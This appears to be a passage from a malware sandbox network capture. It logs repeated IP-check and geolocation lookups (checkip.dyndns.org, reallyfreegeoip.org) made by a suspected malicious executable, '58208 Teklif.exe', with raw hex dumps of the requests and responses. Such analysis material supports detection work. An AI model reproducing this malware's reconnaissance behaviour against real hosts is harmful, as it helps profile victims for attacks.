                                                    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 30 32 2e 31 32 39 2e 31 35 32 2e 32 33 31 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 102.129.152.231</body></html>


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    3192.168.2.1149719193.122.130.0807580C:\Users\user\Desktop\58208 Teklif.exe
                                                    TimestampBytes transferredDirectionData
                                                    Apr 8, 2024 13:01:53.086651087 CEST151OUTGET / HTTP/1.1
                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                    Host: checkip.dyndns.org
                                                    Connection: Keep-Alive
                                                    Apr 8, 2024 13:01:53.241333008 CEST276INHTTP/1.1 200 OK
                                                    Date: Mon, 08 Apr 2024 11:01:53 GMT
                                                    Content-Type: text/html
                                                    Content-Length: 107
                                                    Connection: keep-alive
                                                    Cache-Control: no-cache
                                                    Pragma: no-cache
                                                    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 30 32 2e 31 32 39 2e 31 35 32 2e 32 33 31 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 102.129.152.231</body></html>


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    4192.168.2.1149721193.122.130.0807580C:\Users\user\Desktop\58208 Teklif.exe
                                                    TimestampBytes transferredDirectionData
                                                    Apr 8, 2024 13:01:53.963572979 CEST151OUTGET / HTTP/1.1
                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                    Host: checkip.dyndns.org
                                                    Connection: Keep-Alive
                                                    Apr 8, 2024 13:01:54.119596004 CEST276INHTTP/1.1 200 OK
                                                    Date: Mon, 08 Apr 2024 11:01:54 GMT
                                                    Content-Type: text/html
                                                    Content-Length: 107
                                                    Connection: keep-alive
                                                    Cache-Control: no-cache
                                                    Pragma: no-cache
                                                    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 30 32 2e 31 32 39 2e 31 35 32 2e 32 33 31 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 102.129.152.231</body></html>


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    5192.168.2.1149723193.122.130.0807580C:\Users\user\Desktop\58208 Teklif.exe
                                                    TimestampBytes transferredDirectionData
                                                    Apr 8, 2024 13:01:54.855967999 CEST151OUTGET / HTTP/1.1
                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                    Host: checkip.dyndns.org
                                                    Connection: Keep-Alive
                                                    Apr 8, 2024 13:01:55.037714958 CEST276INHTTP/1.1 200 OK
                                                    Date: Mon, 08 Apr 2024 11:01:54 GMT
                                                    Content-Type: text/html
                                                    Content-Length: 107
                                                    Connection: keep-alive
                                                    Cache-Control: no-cache
                                                    Pragma: no-cache
                                                    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 30 32 2e 31 32 39 2e 31 35 32 2e 32 33 31 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 102.129.152.231</body></html>


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    6192.168.2.1149725193.122.130.0807580C:\Users\user\Desktop\58208 Teklif.exe
                                                    TimestampBytes transferredDirectionData
                                                    Apr 8, 2024 13:01:55.758650064 CEST151OUTGET / HTTP/1.1
                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                    Host: checkip.dyndns.org
                                                    Connection: Keep-Alive
                                                    Apr 8, 2024 13:01:55.912643909 CEST276INHTTP/1.1 200 OK
                                                    Date: Mon, 08 Apr 2024 11:01:55 GMT
                                                    Content-Type: text/html
                                                    Content-Length: 107
                                                    Connection: keep-alive
                                                    Cache-Control: no-cache
                                                    Pragma: no-cache
                                                    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 30 32 2e 31 32 39 2e 31 35 32 2e 32 33 31 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 102.129.152.231</body></html>


                                                    HTTPS Proxied Packets

                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    0192.168.2.1149711104.21.67.1524437580C:\Users\user\Desktop\58208 Teklif.exe
                                                    TimestampBytes transferredDirectionData
                                                    2024-04-08 11:01:50 UTC88OUTGET /xml/102.129.152.231 HTTP/1.1
                                                    Host: reallyfreegeoip.org
                                                    Connection: Keep-Alive
                                                    2024-04-08 11:01:50 UTC708INHTTP/1.1 200 OK
                                                    Date: Mon, 08 Apr 2024 11:01:50 GMT
                                                    Content-Type: application/xml
                                                    Transfer-Encoding: chunked
                                                    Connection: close
                                                    access-control-allow-origin: *
                                                    vary: Accept-Encoding
                                                    Cache-Control: max-age=86400
                                                    CF-Cache-Status: HIT
                                                    Age: 76011
                                                    Last-Modified: Sun, 07 Apr 2024 13:54:59 GMT
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=mWTS1oyLF6iV945BZPo52O1mzWfGIrAuN%2Fz%2BZWNTEF7cCd8PY%2B0pLvBvwneAVnDdW%2BLKbQLSOl56gBEDPsIe1Gqqel1uVUpnuqU4t5Z0TP779m6J6HHFGLoLW0vai9gSk6PfpREN"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 8711c2fdc92a3370-MIA
                                                    alt-svc: h3=":443"; ma=86400
                                                    2024-04-08 11:01:50 UTC380INData Raw: 31 37 35 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 30 32 2e 31 32 39 2e 31 35 32 2e 32 33 31 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 43 41 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 43 61 6c 69 66 6f 72 6e 69 61 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4c 6f 73 20 41 6e 67 65 6c 65 73 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 39 30 30 30 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4c 6f 73
                                                    Data Ascii: 175<Response><IP>102.129.152.231</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>CA</RegionCode><RegionName>California</RegionName><City>Los Angeles</City><ZipCode>90009</ZipCode><TimeZone>America/Los
                                                    2024-04-08 11:01:50 UTC5INData Raw: 30 0d 0a 0d 0a
                                                    Data Ascii: 0


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    1192.168.2.1149712104.21.67.1524437580C:\Users\user\Desktop\58208 Teklif.exe
                                                    TimestampBytes transferredDirectionData
                                                    2024-04-08 11:01:50 UTC64OUTGET /xml/102.129.152.231 HTTP/1.1
                                                    Host: reallyfreegeoip.org
                                                    2024-04-08 11:01:51 UTC704INHTTP/1.1 200 OK
                                                    Date: Mon, 08 Apr 2024 11:01:51 GMT
                                                    Content-Type: application/xml
                                                    Transfer-Encoding: chunked
                                                    Connection: close
                                                    access-control-allow-origin: *
                                                    vary: Accept-Encoding
                                                    Cache-Control: max-age=86400
                                                    CF-Cache-Status: HIT
                                                    Age: 76012
                                                    Last-Modified: Sun, 07 Apr 2024 13:54:59 GMT
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=o6reQkPXTG1pMgzPnbGB4t6yY1WU8tsyRKVg2nsh7HXZylR0dMyIH3v3tcdlkhiPh6kbdjohDZHpBewb7gD5x940DDGF4V1KPE1ezmkNu1m0AGdeCPY1LFR3p%2BwhUOKE8Nq2%2B4kD"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 8711c3024b04748d-MIA
                                                    alt-svc: h3=":443"; ma=86400
                                                    2024-04-08 11:01:51 UTC380INData Raw: 31 37 35 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 30 32 2e 31 32 39 2e 31 35 32 2e 32 33 31 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 43 41 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 43 61 6c 69 66 6f 72 6e 69 61 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4c 6f 73 20 41 6e 67 65 6c 65 73 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 39 30 30 30 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4c 6f 73
                                                    Data Ascii: 175<Response><IP>102.129.152.231</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>CA</RegionCode><RegionName>California</RegionName><City>Los Angeles</City><ZipCode>90009</ZipCode><TimeZone>America/Los
                                                    2024-04-08 11:01:51 UTC5INData Raw: 30 0d 0a 0d 0a
                                                    Data Ascii: 0


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    2192.168.2.1149714104.21.67.1524437580C:\Users\user\Desktop\58208 Teklif.exe
                                                    TimestampBytes transferredDirectionData
                                                    2024-04-08 11:01:51 UTC88OUTGET /xml/102.129.152.231 HTTP/1.1
                                                    Host: reallyfreegeoip.org
                                                    Connection: Keep-Alive
                                                    2024-04-08 11:01:52 UTC706INHTTP/1.1 200 OK
                                                    Date: Mon, 08 Apr 2024 11:01:51 GMT
                                                    Content-Type: application/xml
                                                    Transfer-Encoding: chunked
                                                    Connection: close
                                                    access-control-allow-origin: *
                                                    vary: Accept-Encoding
                                                    Cache-Control: max-age=86400
                                                    CF-Cache-Status: HIT
                                                    Age: 76012
                                                    Last-Modified: Sun, 07 Apr 2024 13:54:59 GMT
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Fvz7BnSXtvkFB%2FaPrH078MMRCEg0hzoz98V%2FIQ93rrrc6LQD7enIBwCI5jfFiC6DU%2Bgwnr2W6raQPOBuFI7NYg5oX7Lm5bsVEmaa7hZ3Rad2ruetmBJzYR3r3K0KJAEoS1mTlAX5"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 8711c307ceba7442-MIA
                                                    alt-svc: h3=":443"; ma=86400
                                                    2024-04-08 11:01:52 UTC380INData Raw: 31 37 35 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 30 32 2e 31 32 39 2e 31 35 32 2e 32 33 31 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 43 41 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 43 61 6c 69 66 6f 72 6e 69 61 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4c 6f 73 20 41 6e 67 65 6c 65 73 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 39 30 30 30 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4c 6f 73
                                                    Data Ascii: 175<Response><IP>102.129.152.231</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>CA</RegionCode><RegionName>California</RegionName><City>Los Angeles</City><ZipCode>90009</ZipCode><TimeZone>America/Los
                                                    2024-04-08 11:01:52 UTC5INData Raw: 30 0d 0a 0d 0a
                                                    Data Ascii: 0


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    3192.168.2.1149717104.21.67.1524437580C:\Users\user\Desktop\58208 Teklif.exe
                                                    TimestampBytes transferredDirectionData
                                                    2024-04-08 11:01:52 UTC88OUTGET /xml/102.129.152.231 HTTP/1.1
                                                    Host: reallyfreegeoip.org
                                                    Connection: Keep-Alive
                                                    2024-04-08 11:01:52 UTC706INHTTP/1.1 200 OK
                                                    Date: Mon, 08 Apr 2024 11:01:52 GMT
                                                    Content-Type: application/xml
                                                    Transfer-Encoding: chunked
                                                    Connection: close
                                                    access-control-allow-origin: *
                                                    vary: Accept-Encoding
                                                    Cache-Control: max-age=86400
                                                    CF-Cache-Status: HIT
                                                    Age: 76013
                                                    Last-Modified: Sun, 07 Apr 2024 13:54:59 GMT
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=KZQsEPa8qD6fGV2vdaj83RRC6UYwpcLsaZAHYCqlaBEeNqHa07Y6yG0FMrgSfc64%2F0GUJh6oVn2QurG%2F1RzjG4spH6TIXBvdltceaDbmZs2kX53AH6uqN%2FOcmFnol5vHToct5rkn"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 8711c30d5fa8747d-MIA
                                                    alt-svc: h3=":443"; ma=86400
                                                    2024-04-08 11:01:52 UTC380INData Raw: 31 37 35 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 30 32 2e 31 32 39 2e 31 35 32 2e 32 33 31 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 43 41 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 43 61 6c 69 66 6f 72 6e 69 61 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4c 6f 73 20 41 6e 67 65 6c 65 73 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 39 30 30 30 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4c 6f 73
                                                    Data Ascii: 175<Response><IP>102.129.152.231</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>CA</RegionCode><RegionName>California</RegionName><City>Los Angeles</City><ZipCode>90009</ZipCode><TimeZone>America/Los
                                                    2024-04-08 11:01:52 UTC5INData Raw: 30 0d 0a 0d 0a
                                                    Data Ascii: 0


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    4192.168.2.1149720104.21.67.1524437580C:\Users\user\Desktop\58208 Teklif.exe
                                                    TimestampBytes transferredDirectionData
                                                    2024-04-08 11:01:53 UTC64OUTGET /xml/102.129.152.231 HTTP/1.1
                                                    Host: reallyfreegeoip.org
                                                    2024-04-08 11:01:53 UTC710INHTTP/1.1 200 OK
                                                    Date: Mon, 08 Apr 2024 11:01:53 GMT
                                                    Content-Type: application/xml
                                                    Transfer-Encoding: chunked
                                                    Connection: close
                                                    access-control-allow-origin: *
                                                    vary: Accept-Encoding
                                                    Cache-Control: max-age=86400
                                                    CF-Cache-Status: HIT
                                                    Age: 76014
                                                    Last-Modified: Sun, 07 Apr 2024 13:54:59 GMT
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=h4y8GrZ3oUJTBy2brsfuSe96zpMCxl4kt8hFGPD8iFAvMLtW9kM4kdn81LeVrY%2BrI1ANB%2FOrSihHle1uQykWx6l72sT9ckE7I406zYAueuVvGwlO%2BYq%2BNMpIfWVw1UiklZt%2BuiMC"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 8711c312ce305c77-MIA
                                                    alt-svc: h3=":443"; ma=86400
                                                    2024-04-08 11:01:53 UTC380INData Raw: 31 37 35 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 30 32 2e 31 32 39 2e 31 35 32 2e 32 33 31 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 43 41 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 43 61 6c 69 66 6f 72 6e 69 61 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4c 6f 73 20 41 6e 67 65 6c 65 73 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 39 30 30 30 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4c 6f 73
                                                    Data Ascii: 175<Response><IP>102.129.152.231</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>CA</RegionCode><RegionName>California</RegionName><City>Los Angeles</City><ZipCode>90009</ZipCode><TimeZone>America/Los
                                                    2024-04-08 11:01:53 UTC5INData Raw: 30 0d 0a 0d 0a
                                                    Data Ascii: 0


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    5192.168.2.1149722104.21.67.1524437580C:\Users\user\Desktop\58208 Teklif.exe
                                                    TimestampBytes transferredDirectionData
                                                    2024-04-08 11:01:54 UTC88OUTGET /xml/102.129.152.231 HTTP/1.1
                                                    Host: reallyfreegeoip.org
                                                    Connection: Keep-Alive
                                                    2024-04-08 11:01:54 UTC714INHTTP/1.1 200 OK
                                                    Date: Mon, 08 Apr 2024 11:01:54 GMT
                                                    Content-Type: application/xml
                                                    Transfer-Encoding: chunked
                                                    Connection: close
                                                    access-control-allow-origin: *
                                                    vary: Accept-Encoding
                                                    Cache-Control: max-age=86400
                                                    CF-Cache-Status: HIT
                                                    Age: 76015
                                                    Last-Modified: Sun, 07 Apr 2024 13:54:59 GMT
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=W3oY4nADz7OrT9WilV8E%2Bg%2FQs1a9987dQ3DnbO9ItdUBWIkJ6svEjerjyJAYJAFOuafpvE2EhqSKFvBwaXDm2uipgg%2Fx4xND2%2FDOg9Yl0MxaNh7nAnb9bkA%2BCXTMRBIMqe%2F%2FHY5s"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 8711c3184fc131e0-MIA
                                                    alt-svc: h3=":443"; ma=86400
                                                    2024-04-08 11:01:54 UTC380INData Raw: 31 37 35 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 30 32 2e 31 32 39 2e 31 35 32 2e 32 33 31 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 43 41 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 43 61 6c 69 66 6f 72 6e 69 61 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4c 6f 73 20 41 6e 67 65 6c 65 73 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 39 30 30 30 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4c 6f 73
                                                    Data Ascii: 175<Response><IP>102.129.152.231</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>CA</RegionCode><RegionName>California</RegionName><City>Los Angeles</City><ZipCode>90009</ZipCode><TimeZone>America/Los
                                                    2024-04-08 11:01:54 UTC5INData Raw: 30 0d 0a 0d 0a
                                                    Data Ascii: 0


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    6192.168.2.1149724104.21.67.1524437580C:\Users\user\Desktop\58208 Teklif.exe
                                                    TimestampBytes transferredDirectionData
                                                    2024-04-08 11:01:55 UTC64OUTGET /xml/102.129.152.231 HTTP/1.1
                                                    Host: reallyfreegeoip.org
                                                    2024-04-08 11:01:55 UTC712INHTTP/1.1 200 OK
                                                    Date: Mon, 08 Apr 2024 11:01:55 GMT
                                                    Content-Type: application/xml
                                                    Transfer-Encoding: chunked
                                                    Connection: close
                                                    access-control-allow-origin: *
                                                    vary: Accept-Encoding
                                                    Cache-Control: max-age=86400
                                                    CF-Cache-Status: HIT
                                                    Age: 76016
                                                    Last-Modified: Sun, 07 Apr 2024 13:54:59 GMT
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=E4atZ%2F5UPTcfpdB%2Bk6%2FA56KcYcRV5BG4F2f6yQcW%2BQQl6Ao6fBUAiRBgO806P7T%2FrAe%2FUNFqPxZIvEJhR0JTNRy6p0LySgAnsDM94RyecAIf3QvTZsfQzI70LgMccb02mtmw3WAN"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 8711c31e09a30321-MIA
                                                    alt-svc: h3=":443"; ma=86400
                                                    2024-04-08 11:01:55 UTC380INData Raw: 31 37 35 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 30 32 2e 31 32 39 2e 31 35 32 2e 32 33 31 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 43 41 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 43 61 6c 69 66 6f 72 6e 69 61 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4c 6f 73 20 41 6e 67 65 6c 65 73 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 39 30 30 30 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4c 6f 73
                                                    Data Ascii: 175<Response><IP>102.129.152.231</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>CA</RegionCode><RegionName>California</RegionName><City>Los Angeles</City><ZipCode>90009</ZipCode><TimeZone>America/Los
                                                    2024-04-08 11:01:55 UTC5INData Raw: 30 0d 0a 0d 0a
                                                    Data Ascii: 0


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    7192.168.2.1149726104.21.67.1524437580C:\Users\user\Desktop\58208 Teklif.exe
                                                    TimestampBytes transferredDirectionData
                                                    2024-04-08 11:01:56 UTC88OUTGET /xml/102.129.152.231 HTTP/1.1
                                                    Host: reallyfreegeoip.org
                                                    Connection: Keep-Alive
                                                    2024-04-08 11:01:56 UTC712INHTTP/1.1 200 OK
                                                    Date: Mon, 08 Apr 2024 11:01:56 GMT
                                                    Content-Type: application/xml
                                                    Transfer-Encoding: chunked
                                                    Connection: close
                                                    access-control-allow-origin: *
                                                    vary: Accept-Encoding
                                                    Cache-Control: max-age=86400
                                                    CF-Cache-Status: HIT
                                                    Age: 76017
                                                    Last-Modified: Sun, 07 Apr 2024 13:54:59 GMT
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=1VlKXsG%2FkCuYU%2B%2B2X61xrVRMYPPyTDqA4eInFI06J7YYelh30CKEK4dJW0rXTOFLEtD2CIfPSY%2BePAaYcPD977Fw0adthJMMreGKfcQIT3d6Kg%2BiqfmVMcVLdND5%2BnU8x1CTM0dh"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 8711c3237d6da587-MIA
                                                    alt-svc: h3=":443"; ma=86400
